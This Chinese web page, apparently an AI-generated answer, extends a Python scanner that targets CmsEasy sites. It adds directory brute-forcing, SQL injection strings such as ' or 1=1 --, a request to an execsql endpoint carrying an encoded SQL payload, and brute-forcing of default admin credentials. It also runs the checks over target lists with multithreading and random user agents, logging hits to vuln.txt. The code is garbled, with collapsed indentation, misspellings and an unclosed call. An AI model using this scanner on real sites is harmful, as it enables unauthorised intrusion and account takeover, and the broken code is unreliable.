• 日期: 2025-08-19
  • 标签: 科技

1.增加一些常见的目录、文件名进行扫描,例如:test.php、index.php、admin.php等等。

2.增加一些常见的注入语句,例如:' or 1=1 --、' or 1=1#、' or '1'='1等等。

3.增加一些常见的后台管理系统的默认账号密码进行扫描,例如:admin/admin、admin/123456、root/root等等。

具体的代码实现:

新增扫描的目录和文件名

dirs = ['test', 'admin', 'manager', 'data', 'config'] files = ['test.php', 'index.php', 'admin.php', 'login.php']

新增注入语句

injects = ["' or 1=1 --", "' or 1=1#", "' or '1'='1"]

新增后台管理系统的默认账号密码

users = ['admin', 'root', 'administrator'] passwords = ['admin', 'root', 'password', '123456']

def check_url(url): # 检查目录和文件名 for d in dirs: url1 = url + '/' + d check_single_url(url1)

    for f in files:
        url2 = url1 + '/' + f
        check_single_url(url2)

# 检查注入语句
for inject in injects:
    url3 = url + "/?case=crossall&act=execsql&sql=" + inject
    check_single_url(url3)

# 检查后台管理系统的默认账号密码
for user in users:
    for password in passwords:
        url4 = url + "/admin/login.php?do=login"
        data = {'username': user, 'password': password}
        headers = {'User-Agent': get_ua()}
        res = requests.post(url4, verify=False, headers=headers, data=data, timeout=5)
        if res.status_code == 200 and '登录失败' not in res.text:
            print("\033[32m[+]{} {} {}\033[0m".format(url4, user, password))
            wirte_targets(url4, "vuln.txt")

def check_single_url(url): url = parse.urlparse(url) url = '{}://{}'.format(url[0], url[1]) url = url + "/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" headers = {'User-Agent': get_ua()} try: res = requests.get(url, verify=False, allow_redirects=False, headers=headers, timeout=5) if res.status_code == 200 and 'password' in res.text: print("\033[32m[+]{}\033[0m".format(url)) wirte_targets(url, "vuln.txt") except Exception as e: pass

修改multithreading函数中的调用方法

if url != None and filename == None: check_single_url(url) elif url == None and filename != None: for i in open(filename): i = i.replace('\n', '') url_list.append(i) for url in url_list: check_url(url

分析下面代码如何提高检测成功率给出具体的代码import requestsimport sysimport urllib3from argparse import ArgumentParserimport threadpoolfrom urllib import parsefrom time import timeimport reimport random#body=cmseasyediturl

原文地址: https://www.cveoy.top/t/topic/czRF 著作权归作者所有。请勿转载和采集!

免费AI点我,无需注册和登录